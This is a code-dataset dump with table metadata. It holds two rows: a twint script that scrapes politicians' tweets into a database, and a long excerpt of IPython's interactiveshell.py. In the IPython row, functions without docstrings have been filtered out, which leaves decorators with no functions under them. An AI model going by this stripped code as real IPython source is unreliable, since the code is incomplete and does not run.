hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2caf5d5429d89c7da649be2382fb440d0361ac1a | 1,950 | py | Python | scrape_twitter.py | Aiyubi/twitter-analyzer | 108e4fbf485594a5a9135ca422131423a90302d8 | [
"MIT"
] | null | null | null | scrape_twitter.py | Aiyubi/twitter-analyzer | 108e4fbf485594a5a9135ca422131423a90302d8 | [
"MIT"
] | null | null | null | scrape_twitter.py | Aiyubi/twitter-analyzer | 108e4fbf485594a5a9135ca422131423a90302d8 | [
"MIT"
] | null | null | null | import database_model as db
from database_model import Politician, Tweet, Hashtag
import sqlalchemy
import twint
import arrow
if __name__ == "__main__":
fill_database()
| 28.26087 | 96 | 0.547179 | import database_model as db
from database_model import Politician, Tweet, Hashtag
import sqlalchemy
import twint
import arrow
def get_tweets(twitter_handle,since,until):
c = twint.Config()
c.Username = twitter_handle
c.Pandas = True
c.Hide_output = True
#c.Retries_count = 1
c.Retweets = True
if since:
c.Since = since.format('YYYY-MM-DD 00:00:00')
else:
c.Since = '2017-09-24 00:00:00'
if until:
c.Until = until.format('YYYY-MM-DD 23:59:59')
#c.Limit = 200
twint.run.Search(c)
return twint.storage.panda.Tweets_df
def fill_database():
session = db.get_session()
politicians =session.query(Politician).all()
counter = 0
for politician in politicians:
counter += 1
print(counter, politician.twitter_handle)
if len(politician.tweets):
print("already scaned, skiping")
continue
if not politician.twitter_handle:
continue
tweets = get_tweets(politician.twitter_handle,politician.start_date,politician.end_date)
try:
for index, tweet in tweets.iterrows():
# print(tweet)
t = Tweet(
id = tweet["id"],
date = arrow.get(tweet["date"]),
text = tweet["tweet"],
nlikes = tweet["nlikes"],
nreplie = tweet["nreplies"],
nretweets = tweet["nretweets"]
)
session.add(t)
politician.tweets.append(t)
for hashtag in tweet["hashtags"]:
h = Hashtag(tag=hashtag[1:])
t.hashtags.append(h)
session.add(h)
session.commit()
except sqlalchemy.exc.IntegrityError:
session.rollback()
continue
if __name__ == "__main__":
fill_database()
| 1,727 | 0 | 46 |
6ab436fc56656bd0a166758dd3675cc7c4ea8e81 | 153,705 | py | Python | Lib/site-packages/IPython/core/interactiveshell.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 3 | 2021-03-29T19:21:08.000Z | 2021-12-31T09:30:11.000Z | Lib/site-packages/IPython/core/interactiveshell.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 2 | 2021-12-04T12:51:07.000Z | 2021-12-04T16:49:18.000Z | Lib/site-packages/IPython/core/interactiveshell.py | hirorin-demon/hirorin-streamlit | 03fbb6f03ec94f909d451e708a3b30b177607695 | [
"0BSD"
] | 1 | 2021-03-30T05:02:53.000Z | 2021-03-30T05:02:53.000Z | # -*- coding: utf-8 -*-
"""Main IPython class."""
#-----------------------------------------------------------------------------
# Copyright (C) 2001 Janko Hauser <jhauser@zscout.de>
# Copyright (C) 2001-2007 Fernando Perez. <fperez@colorado.edu>
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
import abc
import ast
import atexit
import builtins as builtin_mod
import functools
import inspect
import os
import re
import runpy
import sys
import tempfile
import traceback
import types
import subprocess
import warnings
from io import open as io_open
from pickleshare import PickleShareDB
from traitlets.config.configurable import SingletonConfigurable
from traitlets.utils.importstring import import_item
from IPython.core import oinspect
from IPython.core import magic
from IPython.core import page
from IPython.core import prefilter
from IPython.core import ultratb
from IPython.core.alias import Alias, AliasManager
from IPython.core.autocall import ExitAutocall
from IPython.core.builtin_trap import BuiltinTrap
from IPython.core.events import EventManager, available_events
from IPython.core.compilerop import CachingCompiler, check_linecache_ipython
from IPython.core.debugger import Pdb
from IPython.core.display_trap import DisplayTrap
from IPython.core.displayhook import DisplayHook
from IPython.core.displaypub import DisplayPublisher
from IPython.core.error import InputRejected, UsageError
from IPython.core.extensions import ExtensionManager
from IPython.core.formatters import DisplayFormatter
from IPython.core.history import HistoryManager
from IPython.core.inputtransformer2 import ESC_MAGIC, ESC_MAGIC2
from IPython.core.logger import Logger
from IPython.core.macro import Macro
from IPython.core.payload import PayloadManager
from IPython.core.prefilter import PrefilterManager
from IPython.core.profiledir import ProfileDir
from IPython.core.usage import default_banner
from IPython.display import display
from IPython.testing.skipdoctest import skip_doctest
from IPython.utils import PyColorize
from IPython.utils import io
from IPython.utils import py3compat
from IPython.utils import openpy
from IPython.utils.decorators import undoc
from IPython.utils.io import ask_yes_no
from IPython.utils.ipstruct import Struct
from IPython.paths import get_ipython_dir
from IPython.utils.path import get_home_dir, get_py_filename, ensure_dir_exists
from IPython.utils.process import system, getoutput
from IPython.utils.strdispatch import StrDispatch
from IPython.utils.syspathcontext import prepended_to_syspath
from IPython.utils.text import format_screen, LSString, SList, DollarFormatter
from IPython.utils.tempdir import TemporaryDirectory
from traitlets import (
Integer, Bool, CaselessStrEnum, Enum, List, Dict, Unicode, Instance, Type,
observe, default, validate, Any
)
from warnings import warn
from logging import error
import IPython.core.hooks
from typing import List as ListType, Tuple, Optional
from ast import AST
# NoOpContext is deprecated, but ipykernel imports it from here.
# See https://github.com/ipython/ipykernel/issues/157
# (2016, let's try to remove than in IPython 8.0)
from IPython.utils.contexts import NoOpContext
try:
import docrepr.sphinxify as sphx
except ImportError:
sphinxify = None
class ProvisionalWarning(DeprecationWarning):
"""
Warning class for unstable features
"""
pass
if sys.version_info > (3,8):
from ast import Module
else :
# mock the new API, ignore second argument
# see https://github.com/ipython/ipython/issues/11590
from ast import Module as OriginalModule
Module = lambda nodelist, type_ignores: OriginalModule(nodelist)
if sys.version_info > (3,6):
_assign_nodes = (ast.AugAssign, ast.AnnAssign, ast.Assign)
_single_targets_nodes = (ast.AugAssign, ast.AnnAssign)
else:
_assign_nodes = (ast.AugAssign, ast.Assign )
_single_targets_nodes = (ast.AugAssign, )
#-----------------------------------------------------------------------------
# Await Helpers
#-----------------------------------------------------------------------------
def removed_co_newlocals(function:types.FunctionType) -> types.FunctionType:
"""Return a function that do not create a new local scope.
Given a function, create a clone of this function where the co_newlocal flag
has been removed, making this function code actually run in the sourounding
scope.
We need this in order to run asynchronous code in user level namespace.
"""
from types import CodeType, FunctionType
CO_NEWLOCALS = 0x0002
code = function.__code__
new_co_flags = code.co_flags & ~CO_NEWLOCALS
if sys.version_info > (3, 8, 0, 'alpha', 3):
new_code = code.replace(co_flags=new_co_flags)
else:
new_code = CodeType(
code.co_argcount,
code.co_kwonlyargcount,
code.co_nlocals,
code.co_stacksize,
new_co_flags,
code.co_code,
code.co_consts,
code.co_names,
code.co_varnames,
code.co_filename,
code.co_name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars
)
return FunctionType(new_code, globals(), function.__name__, function.__defaults__)
# we still need to run things using the asyncio eventloop, but there is no
# async integration
from .async_helpers import (_asyncio_runner, _asyncify, _pseudo_sync_runner)
from .async_helpers import _curio_runner, _trio_runner, _should_be_async
def _ast_asyncify(cell:str, wrapper_name:str) -> ast.Module:
"""
Parse a cell with top-level await and modify the AST to be able to run it later.
Parameter
---------
cell: str
The code cell to asyncronify
wrapper_name: str
The name of the function to be used to wrap the passed `cell`. It is
advised to **not** use a python identifier in order to not pollute the
global namespace in which the function will be ran.
Return
------
A module object AST containing **one** function named `wrapper_name`.
The given code is wrapped in a async-def function, parsed into an AST, and
the resulting function definition AST is modified to return the last
expression.
The last expression or await node is moved into a return statement at the
end of the function, and removed from its original location. If the last
node is not Expr or Await nothing is done.
The function `__code__` will need to be later modified (by
``removed_co_newlocals``) in a subsequent step to not create new `locals()`
meaning that the local and global scope are the same, ie as if the body of
the function was at module level.
Lastly a call to `locals()` is made just before the last expression of the
function, or just after the last assignment or statement to make sure the
global dict is updated as python function work with a local fast cache which
is updated only on `local()` calls.
"""
from ast import Expr, Await, Return
if sys.version_info >= (3,8):
return ast.parse(cell)
tree = ast.parse(_asyncify(cell))
function_def = tree.body[0]
function_def.name = wrapper_name
try_block = function_def.body[0]
lastexpr = try_block.body[-1]
if isinstance(lastexpr, (Expr, Await)):
try_block.body[-1] = Return(lastexpr.value)
ast.fix_missing_locations(tree)
return tree
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
# compiled regexps for autoindent management
dedent_re = re.compile(r'^\s+raise|^\s+return|^\s+pass')
#-----------------------------------------------------------------------------
# Utilities
#-----------------------------------------------------------------------------
@undoc
def softspace(file, newvalue):
"""Copied from code.py, to remove the dependency"""
oldvalue = 0
try:
oldvalue = file.softspace
except AttributeError:
pass
try:
file.softspace = newvalue
except (AttributeError, TypeError):
# "attribute-less object" or "read-only attributes"
pass
return oldvalue
@undoc
def get_default_colors():
"DEPRECATED"
warn('get_default_color is deprecated since IPython 5.0, and returns `Neutral` on all platforms.',
DeprecationWarning, stacklevel=2)
return 'Neutral'
class SeparateUnicode(Unicode):
r"""A Unicode subclass to validate separate_in, separate_out, etc.
This is a Unicode based trait that converts '0'->'' and ``'\\n'->'\n'``.
"""
@undoc
class DummyMod(object):
"""A dummy module used for IPython's interactive module when
a namespace must be assigned to the module's __dict__."""
__spec__ = None
class ExecutionInfo(object):
"""The arguments used for a call to :meth:`InteractiveShell.run_cell`
Stores information about what is going to happen.
"""
raw_cell = None
store_history = False
silent = False
shell_futures = True
class ExecutionResult(object):
"""The result of a call to :meth:`InteractiveShell.run_cell`
Stores information about what took place.
"""
execution_count = None
error_before_exec = None
error_in_exec = None
info = None
result = None
@property
def raise_error(self):
"""Reraises error if `success` is `False`, otherwise does nothing"""
if self.error_before_exec is not None:
raise self.error_before_exec
if self.error_in_exec is not None:
raise self.error_in_exec
class InteractiveShell(SingletonConfigurable):
"""An enhanced, interactive shell for Python."""
_instance = None
ast_transformers = List([], help=
"""
A list of ast.NodeTransformer subclass instances, which will be applied
to user input before code is run.
"""
).tag(config=True)
autocall = Enum((0,1,2), default_value=0, help=
"""
Make IPython automatically call any callable object even if you didn't
type explicit parentheses. For example, 'str 43' becomes 'str(43)'
automatically. The value can be '0' to disable the feature, '1' for
'smart' autocall, where it is not applied if there are no more
arguments on the line, and '2' for 'full' autocall, where all callable
objects are automatically called (even if no arguments are present).
"""
).tag(config=True)
autoindent = Bool(True, help=
"""
Autoindent IPython code entered interactively.
"""
).tag(config=True)
autoawait = Bool(True, help=
"""
Automatically run await statement in the top level repl.
"""
).tag(config=True)
loop_runner_map ={
'asyncio':(_asyncio_runner, True),
'curio':(_curio_runner, True),
'trio':(_trio_runner, True),
'sync': (_pseudo_sync_runner, False)
}
loop_runner = Any(default_value="IPython.core.interactiveshell._asyncio_runner",
allow_none=True,
help="""Select the loop runner that will be used to execute top-level asynchronous code"""
).tag(config=True)
@default('loop_runner')
@validate('loop_runner')
automagic = Bool(True, help=
"""
Enable magic commands to be called without the leading %.
"""
).tag(config=True)
banner1 = Unicode(default_banner,
help="""The part of the banner to be printed before the profile"""
).tag(config=True)
banner2 = Unicode('',
help="""The part of the banner to be printed after the profile"""
).tag(config=True)
cache_size = Integer(1000, help=
"""
Set the size of the output cache. The default is 1000, you can
change it permanently in your config file. Setting it to 0 completely
disables the caching system, and the minimum value accepted is 3 (if
you provide a value less than 3, it is reset to 0 and a warning is
issued). This limit is defined because otherwise you'll spend more
time re-flushing a too small cache than working
"""
).tag(config=True)
color_info = Bool(True, help=
"""
Use colors for displaying information about objects. Because this
information is passed through a pager (like 'less'), and some pagers
get confused with color codes, this capability can be turned off.
"""
).tag(config=True)
colors = CaselessStrEnum(('Neutral', 'NoColor','LightBG','Linux'),
default_value='Neutral',
help="Set the color scheme (NoColor, Neutral, Linux, or LightBG)."
).tag(config=True)
debug = Bool(False).tag(config=True)
disable_failing_post_execute = Bool(False,
help="Don't call post-execute functions that have failed in the past."
).tag(config=True)
display_formatter = Instance(DisplayFormatter, allow_none=True)
displayhook_class = Type(DisplayHook)
display_pub_class = Type(DisplayPublisher)
compiler_class = Type(CachingCompiler)
sphinxify_docstring = Bool(False, help=
"""
Enables rich html representation of docstrings. (This requires the
docrepr module).
""").tag(config=True)
@observe("sphinxify_docstring")
enable_html_pager = Bool(False, help=
"""
(Provisional API) enables html representation in mime bundles sent
to pagers.
""").tag(config=True)
@observe("enable_html_pager")
data_pub_class = None
exit_now = Bool(False)
exiter = Instance(ExitAutocall)
@default('exiter')
# Monotonically increasing execution counter
execution_count = Integer(1)
filename = Unicode("<ipython console>")
ipython_dir= Unicode('').tag(config=True) # Set to get_ipython_dir() in __init__
# Used to transform cells before running them, and check whether code is complete
input_transformer_manager = Instance('IPython.core.inputtransformer2.TransformerManager',
())
@property
input_transformers_post = List([],
help="A list of string input transformers, to be applied after IPython's "
"own input transformations."
)
@property
def input_splitter(self):
"""Make this available for backward compatibility (pre-7.0 release) with existing code.
For example, ipykernel ipykernel currently uses
`shell.input_splitter.check_complete`
"""
from warnings import warn
warn("`input_splitter` is deprecated since IPython 7.0, prefer `input_transformer_manager`.",
DeprecationWarning, stacklevel=2
)
return self.input_transformer_manager
logstart = Bool(False, help=
"""
Start logging to the default log file in overwrite mode.
Use `logappend` to specify a log file to **append** logs to.
"""
).tag(config=True)
logfile = Unicode('', help=
"""
The name of the logfile to use.
"""
).tag(config=True)
logappend = Unicode('', help=
"""
Start logging to the given file in append mode.
Use `logfile` to specify a log file to **overwrite** logs to.
"""
).tag(config=True)
object_info_string_level = Enum((0,1,2), default_value=0,
).tag(config=True)
pdb = Bool(False, help=
"""
Automatically call the pdb debugger after every exception.
"""
).tag(config=True)
display_page = Bool(False,
help="""If True, anything that would be passed to the pager
will be displayed as regular output instead."""
).tag(config=True)
# deprecated prompt traits:
prompt_in1 = Unicode('In [\\#]: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompt_in2 = Unicode(' .\\D.: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompt_out = Unicode('Out[\\#]: ',
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
prompts_pad_left = Bool(True,
help="Deprecated since IPython 4.0 and ignored since 5.0, set TerminalInteractiveShell.prompts object directly."
).tag(config=True)
@observe('prompt_in1', 'prompt_in2', 'prompt_out', 'prompt_pad_left')
show_rewritten_input = Bool(True,
help="Show rewritten input, e.g. for autocall."
).tag(config=True)
quiet = Bool(False).tag(config=True)
history_length = Integer(10000,
help='Total length of command history'
).tag(config=True)
history_load_length = Integer(1000, help=
"""
The number of saved history entries to be loaded
into the history buffer at startup.
"""
).tag(config=True)
ast_node_interactivity = Enum(['all', 'last', 'last_expr', 'none', 'last_expr_or_assign'],
default_value='last_expr',
help="""
'all', 'last', 'last_expr' or 'none', 'last_expr_or_assign' specifying
which nodes should be run interactively (displaying output from expressions).
"""
).tag(config=True)
# TODO: this part of prompt management should be moved to the frontends.
# Use custom TraitTypes that convert '0'->'' and '\\n'->'\n'
separate_in = SeparateUnicode('\n').tag(config=True)
separate_out = SeparateUnicode('').tag(config=True)
separate_out2 = SeparateUnicode('').tag(config=True)
wildcards_case_sensitive = Bool(True).tag(config=True)
xmode = CaselessStrEnum(('Context', 'Plain', 'Verbose', 'Minimal'),
default_value='Context',
help="Switch modes for the IPython exception handlers."
).tag(config=True)
# Subcomponents of InteractiveShell
alias_manager = Instance('IPython.core.alias.AliasManager', allow_none=True)
prefilter_manager = Instance('IPython.core.prefilter.PrefilterManager', allow_none=True)
builtin_trap = Instance('IPython.core.builtin_trap.BuiltinTrap', allow_none=True)
display_trap = Instance('IPython.core.display_trap.DisplayTrap', allow_none=True)
extension_manager = Instance('IPython.core.extensions.ExtensionManager', allow_none=True)
payload_manager = Instance('IPython.core.payload.PayloadManager', allow_none=True)
history_manager = Instance('IPython.core.history.HistoryAccessorBase', allow_none=True)
magics_manager = Instance('IPython.core.magic.MagicsManager', allow_none=True)
profile_dir = Instance('IPython.core.application.ProfileDir', allow_none=True)
@property
# Private interface
_post_execute = Dict()
# Tracks any GUI loop loaded for pylab
pylab_gui_select = None
last_execution_succeeded = Bool(True, help='Did last executed command succeeded')
last_execution_result = Instance('IPython.core.interactiveshell.ExecutionResult', help='Result of executing the last command', allow_none=True)
def get_ipython(self):
"""Return the currently running IPython instance."""
return self
#-------------------------------------------------------------------------
# Trait changed handlers
#-------------------------------------------------------------------------
@observe('ipython_dir')
def set_autoindent(self,value=None):
"""Set the autoindent flag.
If called with no arguments, it acts as a toggle."""
if value is None:
self.autoindent = not self.autoindent
else:
self.autoindent = value
#-------------------------------------------------------------------------
# init_* methods called by __init__
#-------------------------------------------------------------------------
def init_environment(self):
"""Any changes we need to make to the user's environment."""
pass
@observe('colors')
def init_logstart(self):
"""Initialize logging in case it was requested at the command line.
"""
if self.logappend:
self.magic('logstart %s append' % self.logappend)
elif self.logfile:
self.magic('logstart %s' % self.logfile)
elif self.logstart:
self.magic('logstart')
def init_deprecation_warnings(self):
"""
register default filter for deprecation warning.
This will allow deprecation warning of function used interactively to show
warning to users, and still hide deprecation warning from libraries import.
"""
if sys.version_info < (3,7):
warnings.filterwarnings("default", category=DeprecationWarning, module=self.user_ns.get("__name__"))
@observe('colors')
def init_virtualenv(self):
"""Add a virtualenv to sys.path so the user can import modules from it.
This isn't perfect: it doesn't use the Python interpreter with which the
virtualenv was built, and it ignores the --no-site-packages option. A
warning will appear suggesting the user installs IPython in the
virtualenv, but for many cases, it probably works well enough.
Adapted from code snippets online.
http://blog.ufsoft.org/2009/1/29/ipython-and-virtualenv
"""
if 'VIRTUAL_ENV' not in os.environ:
# Not in a virtualenv
return
p = os.path.normcase(sys.executable)
p_venv = os.path.normcase(os.environ['VIRTUAL_ENV'])
# executable path should end like /bin/python or \\scripts\\python.exe
p_exe_up2 = os.path.dirname(os.path.dirname(p))
if p_exe_up2 and os.path.exists(p_venv) and os.path.samefile(p_exe_up2, p_venv):
# Our exe is inside the virtualenv, don't need to do anything.
return
# fallback venv detection:
# stdlib venv may symlink sys.executable, so we can't use realpath.
# but others can symlink *to* the venv Python, so we can't just use sys.executable.
# So we just check every item in the symlink tree (generally <= 3)
paths = [p]
while os.path.islink(p):
p = os.path.normcase(os.path.join(os.path.dirname(p), os.readlink(p)))
paths.append(p)
# In Cygwin paths like "c:\..." and '\cygdrive\c\...' are possible
if p_venv.startswith('\\cygdrive'):
p_venv = p_venv[11:]
elif len(p_venv) >= 2 and p_venv[1] == ':':
p_venv = p_venv[2:]
if any(p_venv in p for p in paths):
# Running properly in the virtualenv, don't need to do anything
return
warn("Attempting to work in a virtualenv. If you encounter problems, please "
"install IPython inside the virtualenv.")
if sys.platform == "win32":
virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'Lib', 'site-packages')
else:
virtual_env = os.path.join(os.environ['VIRTUAL_ENV'], 'lib',
'python%d.%d' % sys.version_info[:2], 'site-packages')
import site
sys.path.insert(0, virtual_env)
site.addsitedir(virtual_env)
#-------------------------------------------------------------------------
# Things related to injections into the sys module
#-------------------------------------------------------------------------
def save_sys_module_state(self):
"""Save the state of hooks in the sys module.
This has to be called after self.user_module is created.
"""
self._orig_sys_module_state = {'stdin': sys.stdin,
'stdout': sys.stdout,
'stderr': sys.stderr,
'excepthook': sys.excepthook}
self._orig_sys_modules_main_name = self.user_module.__name__
self._orig_sys_modules_main_mod = sys.modules.get(self.user_module.__name__)
def restore_sys_module_state(self):
"""Restore the state of the sys module."""
try:
for k, v in self._orig_sys_module_state.items():
setattr(sys, k, v)
except AttributeError:
pass
# Reset what what done in self.init_sys_modules
if self._orig_sys_modules_main_mod is not None:
sys.modules[self._orig_sys_modules_main_name] = self._orig_sys_modules_main_mod
#-------------------------------------------------------------------------
# Things related to the banner
#-------------------------------------------------------------------------
@property
#-------------------------------------------------------------------------
# Things related to hooks
#-------------------------------------------------------------------------
def set_hook(self,name,hook, priority=50, str_key=None, re_key=None,
_warn_deprecated=True):
"""set_hook(name,hook) -> sets an internal IPython hook.
IPython exposes some of its internal API as user-modifiable hooks. By
adding your function to one of these hooks, you can modify IPython's
behavior to call at runtime your own routines."""
# At some point in the future, this should validate the hook before it
# accepts it. Probably at least check that the hook takes the number
# of args it's supposed to.
f = types.MethodType(hook,self)
# check if the hook is for strdispatcher first
if str_key is not None:
sdp = self.strdispatchers.get(name, StrDispatch())
sdp.add_s(str_key, f, priority )
self.strdispatchers[name] = sdp
return
if re_key is not None:
sdp = self.strdispatchers.get(name, StrDispatch())
sdp.add_re(re.compile(re_key), f, priority )
self.strdispatchers[name] = sdp
return
dp = getattr(self.hooks, name, None)
if name not in IPython.core.hooks.__all__:
print("Warning! Hook '%s' is not one of %s" % \
(name, IPython.core.hooks.__all__ ))
if _warn_deprecated and (name in IPython.core.hooks.deprecated):
alternative = IPython.core.hooks.deprecated[name]
warn("Hook {} is deprecated. Use {} instead.".format(name, alternative), stacklevel=2)
if not dp:
dp = IPython.core.hooks.CommandChainDispatcher()
try:
dp.add(f,priority)
except AttributeError:
# it was not commandchain, plain old func - replace
dp = f
setattr(self.hooks,name, dp)
#-------------------------------------------------------------------------
# Things related to events
#-------------------------------------------------------------------------
def register_post_execute(self, func):
"""DEPRECATED: Use ip.events.register('post_run_cell', func)
Register a function for calling after code execution.
"""
warn("ip.register_post_execute is deprecated, use "
"ip.events.register('post_run_cell', func) instead.", stacklevel=2)
self.events.register('post_run_cell', func)
#-------------------------------------------------------------------------
# Things related to the "main" module
#-------------------------------------------------------------------------
def new_main_mod(self, filename, modname):
"""Return a new 'main' module object for user code execution.
``filename`` should be the path of the script which will be run in the
module. Requests with the same filename will get the same module, with
its namespace cleared.
``modname`` should be the module name - normally either '__main__' or
the basename of the file without the extension.
When scripts are executed via %run, we must keep a reference to their
__main__ module around so that Python doesn't
clear it, rendering references to module globals useless.
This method keeps said reference in a private dict, keyed by the
absolute path of the script. This way, for multiple executions of the
same script we only keep one copy of the namespace (the last one),
thus preventing memory leaks from old references while allowing the
objects from the last execution to be accessible.
"""
filename = os.path.abspath(filename)
try:
main_mod = self._main_mod_cache[filename]
except KeyError:
main_mod = self._main_mod_cache[filename] = types.ModuleType(
modname,
doc="Module created for script run in IPython")
else:
main_mod.__dict__.clear()
main_mod.__name__ = modname
main_mod.__file__ = filename
# It seems pydoc (and perhaps others) needs any module instance to
# implement a __nonzero__ method
main_mod.__nonzero__ = lambda : True
return main_mod
def clear_main_mod_cache(self):
"""Clear the cache of main modules.
Mainly for use by utilities like %reset.
Examples
--------
In [15]: import IPython
In [16]: m = _ip.new_main_mod(IPython.__file__, 'IPython')
In [17]: len(_ip._main_mod_cache) > 0
Out[17]: True
In [18]: _ip.clear_main_mod_cache()
In [19]: len(_ip._main_mod_cache) == 0
Out[19]: True
"""
self._main_mod_cache.clear()
#-------------------------------------------------------------------------
# Things related to debugging
#-------------------------------------------------------------------------
call_pdb = property(_get_call_pdb,_set_call_pdb,None,
'Control auto-activation of pdb at exceptions')
def debugger(self,force=False):
"""Call the pdb debugger.
Keywords:
- force(False): by default, this routine checks the instance call_pdb
flag and does not actually invoke the debugger if the flag is false.
The 'force' option forces the debugger to activate even if the flag
is false.
"""
if not (force or self.call_pdb):
return
if not hasattr(sys,'last_traceback'):
error('No traceback has been produced, nothing to debug.')
return
self.InteractiveTB.debugger(force=True)
#-------------------------------------------------------------------------
# Things related to IPython's various namespaces
#-------------------------------------------------------------------------
default_user_namespaces = True
@property
def prepare_user_module(self, user_module=None, user_ns=None):
"""Prepare the module and namespace in which user code will be run.
When IPython is started normally, both parameters are None: a new module
is created automatically, and its __dict__ used as the namespace.
If only user_module is provided, its __dict__ is used as the namespace.
If only user_ns is provided, a dummy module is created, and user_ns
becomes the global namespace. If both are provided (as they may be
when embedding), user_ns is the local namespace, and user_module
provides the global namespace.
Parameters
----------
user_module : module, optional
The current user module in which IPython is being run. If None,
a clean module will be created.
user_ns : dict, optional
A namespace in which to run interactive commands.
Returns
-------
A tuple of user_module and user_ns, each properly initialised.
"""
if user_module is None and user_ns is not None:
user_ns.setdefault("__name__", "__main__")
user_module = DummyMod()
user_module.__dict__ = user_ns
if user_module is None:
user_module = types.ModuleType("__main__",
doc="Automatically created module for IPython interactive environment")
# We must ensure that __builtin__ (without the final 's') is always
# available and pointing to the __builtin__ *module*. For more details:
# http://mail.python.org/pipermail/python-dev/2001-April/014068.html
user_module.__dict__.setdefault('__builtin__', builtin_mod)
user_module.__dict__.setdefault('__builtins__', builtin_mod)
if user_ns is None:
user_ns = user_module.__dict__
return user_module, user_ns
def init_user_ns(self):
"""Initialize all user-visible namespaces to their minimum defaults.
Certain history lists are also initialized here, as they effectively
act as user namespaces.
Notes
-----
All data structures here are only filled in, they are NOT reset by this
method. If they were not empty before, data will simply be added to
them.
"""
# This function works in two parts: first we put a few things in
# user_ns, and we sync that contents into user_ns_hidden so that these
# initial variables aren't shown by %who. After the sync, we add the
# rest of what we *do* want the user to see with %who even on a new
# session (probably nothing, so they really only see their own stuff)
# The user dict must *always* have a __builtin__ reference to the
# Python standard __builtin__ namespace, which must be imported.
# This is so that certain operations in prompt evaluation can be
# reliably executed with builtins. Note that we can NOT use
# __builtins__ (note the 's'), because that can either be a dict or a
# module, and can even mutate at runtime, depending on the context
# (Python makes no guarantees on it). In contrast, __builtin__ is
# always a module object, though it must be explicitly imported.
# For more details:
# http://mail.python.org/pipermail/python-dev/2001-April/014068.html
ns = {}
# make global variables for user access to the histories
ns['_ih'] = self.history_manager.input_hist_parsed
ns['_oh'] = self.history_manager.output_hist
ns['_dh'] = self.history_manager.dir_hist
# user aliases to input and output histories. These shouldn't show up
# in %who, as they can have very large reprs.
ns['In'] = self.history_manager.input_hist_parsed
ns['Out'] = self.history_manager.output_hist
# Store myself as the public api!!!
ns['get_ipython'] = self.get_ipython
ns['exit'] = self.exiter
ns['quit'] = self.exiter
# Sync what we've added so far to user_ns_hidden so these aren't seen
# by %who
self.user_ns_hidden.update(ns)
# Anything put into ns now would show up in %who. Think twice before
# putting anything here, as we really want %who to show the user their
# stuff, not our variables.
# Finally, update the real user's namespace
self.user_ns.update(ns)
@property
def all_ns_refs(self):
"""Get a list of references to all the namespace dictionaries in which
IPython might store a user-created object.
Note that this does not include the displayhook, which also caches
objects from the output."""
return [self.user_ns, self.user_global_ns, self.user_ns_hidden] + \
[m.__dict__ for m in self._main_mod_cache.values()]
    def reset(self, new_session=True, aggressive=False):
        """Clear all internal namespaces, and attempt to release references to
        user objects.

        Parameters
        ----------
        new_session : bool
            If True (default), open a new history session and restart the
            execution counter at 1.
        aggressive : bool
            If True, also delete from sys.modules every module imported since
            the ``_sys_modules_keys`` snapshot was taken; multiprocessing
            modules are spared (presumably to keep worker pools usable —
            confirm).  Requires the snapshot to exist.
        """
        # Clear histories
        self.history_manager.reset(new_session)
        # Reset counter used to index all histories
        if new_session:
            self.execution_count = 1

        # Reset last execution result
        self.last_execution_succeeded = True
        self.last_execution_result = None

        # Flush cached output items
        if self.displayhook.do_full_cache:
            self.displayhook.flush()

        # The main execution namespaces must be cleared very carefully,
        # skipping the deletion of the builtin-related keys, because doing so
        # would cause errors in many object's __del__ methods.
        if self.user_ns is not self.user_global_ns:
            self.user_ns.clear()
        ns = self.user_global_ns
        drop_keys = set(ns.keys())
        drop_keys.discard('__builtin__')
        drop_keys.discard('__builtins__')
        drop_keys.discard('__name__')
        for k in drop_keys:
            del ns[k]

        self.user_ns_hidden.clear()

        # Restore the user namespaces to minimal usability
        self.init_user_ns()

        if aggressive and not hasattr(self, "_sys_modules_keys"):
            print("Cannot restore sys.module, no snapshot")
        elif aggressive:
            print("culling sys module...")
            current_keys = set(sys.modules.keys())
            for k in current_keys - self._sys_modules_keys:
                if k.startswith("multiprocessing"):
                    continue
                del sys.modules[k]

        # Restore the default and user aliases
        self.alias_manager.clear_aliases()
        self.alias_manager.init_aliases()

        # Now define aliases that only make sense on the terminal, because they
        # need direct access to the console in a way that we can't emulate in
        # GUI or web frontend
        if os.name == 'posix':
            for cmd in ('clear', 'more', 'less', 'man'):
                if cmd not in self.magics_manager.magics['line']:
                    self.alias_manager.soft_define_alias(cmd, cmd)

